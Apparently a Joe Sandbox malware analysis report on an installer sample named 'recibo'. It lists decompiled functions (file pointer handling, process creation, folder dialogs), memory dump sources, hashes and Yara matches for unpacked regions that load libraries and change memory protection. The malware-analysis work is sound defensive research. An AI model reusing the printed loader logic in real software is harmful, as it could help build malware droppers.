                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                  • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                                                  • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                  • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E004034E5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                  0x004034f3
                                                                                  0x004034f9

                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 973152223-0
                                                                                  • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                  • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                  • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                  • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004044BB Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E004044BB(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42d264, _a4); // executed
				return _t2;
			}




                                                                                  0x004044c5
                                                                                  0x004044cb

                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                  • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                                                  • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                  • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 78%
                                                                                  			E00401FA4(void* __ecx) {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t17 = __ecx;
				_t19 = E00402DA6(_t15);
				E0040559F(0xffffffeb, _t7); // executed
				_t9 = E00405B20(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E004069B5(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                                                  0x00401fa4
                                                                                  0x00401faa
                                                                                  0x00401faf
                                                                                  0x00401fb5
                                                                                  0x00401fba
                                                                                  0x00401fbe
                                                                                  0x0040292e
                                                                                  0x00401fc4
                                                                                  0x00401fc7
                                                                                  0x00401fca
                                                                                  0x00401fd2
                                                                                  0x00401fe1
                                                                                  0x00401fe3
                                                                                  0x00401fe3
                                                                                  0x00401fd4
                                                                                  0x00401fd8
                                                                                  0x00401fd8
                                                                                  0x00401fd2
                                                                                  0x00401fea
                                                                                  0x00401feb
                                                                                  0x00401feb
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,004231B5,773423A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,004231B5,773423A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                    • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00403418), ref: 004055FA
                                                                                    • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll), ref: 0040560C
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                    • Part of subcall function 00405B20: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
                                                                                    • Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                    • Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
                                                                                    • Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32(?,?), ref: 004069E8
                                                                                    • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2972824698-0
                                                                                  • Opcode ID: fa18f46a8673bca6434a5c9373a6cbc3dc8609fa07edefac18420a2ce970209b
                                                                                  • Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
                                                                                  • Opcode Fuzzy Hash: fa18f46a8673bca6434a5c9373a6cbc3dc8609fa07edefac18420a2ce970209b
                                                                                  • Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Function 0040498A Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 78%
                                                                                  			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c240; // 0x5bcfcc
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B81(0x3fb, _t146);
					E004067C4(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B81(0x3fb, _t146);
							if(E00405F14(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653D(0x42b238, _t146);
							_t87 = E0040690A(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653D(0x42b238, _t146);
								_t89 = E00405EB7(0x42b238);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b238) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E58(0x42b238);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b238) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E27(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x433edc; // 0x5c09b6
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404E0F(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b228);
									} else {
										E00404D46(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044BB(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d258 == _t158) {
									E004048E3();
								}
								 *0x42d258 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d268;
							_v60 = E00404CE0;
							_v56 = _t146;
							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E0C(_t146);
								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == 0x440800) {
									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
										lstrcatW(_t146, 0x432ea0);
									}
								}
								 *0x42d258 =  *0x42d258 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
						E00405E0C(_t146);
					}
					 *0x433ed8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404499(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404499(_t167);
					E004044CE(_t166);
					_t138 = E0040690A(8);
					if(_t138 == 0) {
						L53:
						return E00404500(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}














































                                                                                  0x0040498a
                                                                                  0x00404990
                                                                                  0x00404996
                                                                                  0x004049a3
                                                                                  0x004049b1
                                                                                  0x004049b4
                                                                                  0x004049bc
                                                                                  0x004049c2
                                                                                  0x004049c2
                                                                                  0x004049ce
                                                                                  0x004049d1
                                                                                  0x00404a3f
                                                                                  0x00404a46
                                                                                  0x00404b1d
                                                                                  0x00404b24
                                                                                  0x00404b33
                                                                                  0x00404b33
                                                                                  0x00404b37
                                                                                  0x00404b41
                                                                                  0x00404b4e
                                                                                  0x00404b50
                                                                                  0x00404b50
                                                                                  0x00404b5e
                                                                                  0x00404b65
                                                                                  0x00404b6c
                                                                                  0x00404b6f
                                                                                  0x00404bab
                                                                                  0x00404bad
                                                                                  0x00404bb3
                                                                                  0x00404bb8
                                                                                  0x00404bbc
                                                                                  0x00404bbe
                                                                                  0x00404bbe
                                                                                  0x00404bda
                                                                                  0x00000000
                                                                                  0x00404bdc
                                                                                  0x00404bdf
                                                                                  0x00404bed
                                                                                  0x00404bf3
                                                                                  0x00404bf4
                                                                                  0x00404bf7
                                                                                  0x00404bfa
                                                                                  0x00000000
                                                                                  0x00404bfa
                                                                                  0x00404b71
                                                                                  0x00404b73
                                                                                  0x00404b77
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404b79
                                                                                  0x00404b79
                                                                                  0x00404b86
                                                                                  0x00404b8b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404b8f
                                                                                  0x00404b91
                                                                                  0x00404b91
                                                                                  0x00404b9a
                                                                                  0x00404b9c
                                                                                  0x00404ba1
                                                                                  0x00404ba4
                                                                                  0x00404ba9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404ba9
                                                                                  0x00404c06
                                                                                  0x00404c10
                                                                                  0x00404c13
                                                                                  0x00404c16
                                                                                  0x00404c1d
                                                                                  0x00404c1d
                                                                                  0x00404c1f
                                                                                  0x00404c1f
                                                                                  0x00404c24
                                                                                  0x00404c26
                                                                                  0x00404c2e
                                                                                  0x00404c35
                                                                                  0x00404c37
                                                                                  0x00404c42
                                                                                  0x00404c42
                                                                                  0x00404c37
                                                                                  0x00404c49
                                                                                  0x00404c52
                                                                                  0x00404c5c
                                                                                  0x00404c64
                                                                                  0x00404c7f
                                                                                  0x00404c66
                                                                                  0x00404c6f
                                                                                  0x00404c6f
                                                                                  0x00404c64
                                                                                  0x00404c84
                                                                                  0x00404c89
                                                                                  0x00404c8e
                                                                                  0x00404c97
                                                                                  0x00404c97
                                                                                  0x00404ca0
                                                                                  0x00404ca2
                                                                                  0x00404ca2
                                                                                  0x00404cae
                                                                                  0x00404cb6
                                                                                  0x00404cc0
                                                                                  0x00404cc0
                                                                                  0x00404cc5
                                                                                  0x00000000
                                                                                  0x00404cc5
                                                                                  0x00404b6f
                                                                                  0x00404b26
                                                                                  0x00404b2d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404b2d
                                                                                  0x00404a4c
                                                                                  0x00404a55
                                                                                  0x00404a6f
                                                                                  0x00404a74
                                                                                  0x00404a7e
                                                                                  0x00404a85
                                                                                  0x00404a91
                                                                                  0x00404a94
                                                                                  0x00404a97
                                                                                  0x00404a9e
                                                                                  0x00404aa6
                                                                                  0x00404aa9
                                                                                  0x00404aad
                                                                                  0x00404ab4
                                                                                  0x00404abc
                                                                                  0x00404b16
                                                                                  0x00404abe
                                                                                  0x00404abf
                                                                                  0x00404ac6
                                                                                  0x00404ad0
                                                                                  0x00404ad8
                                                                                  0x00404ae5
                                                                                  0x00404af9
                                                                                  0x00404afd
                                                                                  0x00404afd
                                                                                  0x00404af9
                                                                                  0x00404b02
                                                                                  0x00404b0f
                                                                                  0x00404b0f
                                                                                  0x00404abc
                                                                                  0x00000000
                                                                                  0x00404a74
                                                                                  0x00404a62
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404a68
                                                                                  0x00000000
                                                                                  0x004049d3
                                                                                  0x004049e0
                                                                                  0x004049e9
                                                                                  0x004049f6
                                                                                  0x004049f6
                                                                                  0x004049fd
                                                                                  0x00404a03
                                                                                  0x00404a0c
                                                                                  0x00404a0f
                                                                                  0x00404a12
                                                                                  0x00404a1a
                                                                                  0x00404a1d
                                                                                  0x00404a20
                                                                                  0x00404a26
                                                                                  0x00404a2d
                                                                                  0x00404a34
                                                                                  0x00404ccb
                                                                                  0x00404cdd
                                                                                  0x00404a3a
                                                                                  0x00404a3d
                                                                                  0x00000000
                                                                                  0x00404a3d
                                                                                  0x00404a34

                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                                  • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                                                                  • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                                                                    • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                                    • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77343420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                    • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                    • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,77343420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                    • Part of subcall function 004067C4: CharPrevW.USER32(?,?,77343420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                  • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                                    • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                    • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                                    • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                  • String ID: A$Call
                                                                                  • API String ID: 2624150263-209694386
                                                                                  • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                  • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                                  • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                  • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CC5269 Relevance: 4.5, Strings: 3, Instructions: 704COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoadMemoryProtectVirtual
                                                                                  • String ID: t|>$vq$QS*
                                                                                  • API String ID: 3389902171-2975856299
                                                                                  • Opcode ID: 896a8931252b7b0cefaa511ff951cc9e9fcf6507a12be52f17c7ef262237a389
                                                                                  • Instruction ID: 9a2f0b501246d2ef7b5609a883fdbb4a56d290e07d81b721caa60c56b3a2e905
                                                                                  • Opcode Fuzzy Hash: 896a8931252b7b0cefaa511ff951cc9e9fcf6507a12be52f17c7ef262237a389
                                                                                  • Instruction Fuzzy Hash: F1423A706083868EDF35DF3888A87DA7BD29F522A0F99C25ECCD59F196D3358582C712
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0059 Relevance: 3.2, Strings: 2, Instructions: 739COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo${Z&n
                                                                                  • API String ID: 0-3281381622
                                                                                  • Opcode ID: e725ec3d72d5032783e48207673a2fa575478d920e16d966d527816876fe9227
                                                                                  • Instruction ID: f497886e38a8ae99f4e3cb05ad683b0e16ca44954a923f999826232742c16944
                                                                                  • Opcode Fuzzy Hash: e725ec3d72d5032783e48207673a2fa575478d920e16d966d527816876fe9227
                                                                                  • Instruction Fuzzy Hash: 7402AD42E3E70599EB833033C1617E76785CF271C6E218B5ADC2AB2961771F0E8E89C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0015 Relevance: 3.2, Strings: 2, Instructions: 719COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo${Z&n
                                                                                  • API String ID: 0-3281381622
                                                                                  • Opcode ID: 16ef3232dc12bbd8aa01337f147de15d755976073a4a8d604c7c16a0314f85cc
                                                                                  • Instruction ID: f38c683280b070639605d44c9a30e6c9bb7c9e2bed8f68f153ff6320534561ac
                                                                                  • Opcode Fuzzy Hash: 16ef3232dc12bbd8aa01337f147de15d755976073a4a8d604c7c16a0314f85cc
                                                                                  • Instruction Fuzzy Hash: 4502BD42E3E70599EB833033C5617E76745CF271C6E228B5ACC2A729A1771F0E8E89C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0001 Relevance: 3.2, Strings: 2, Instructions: 714COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
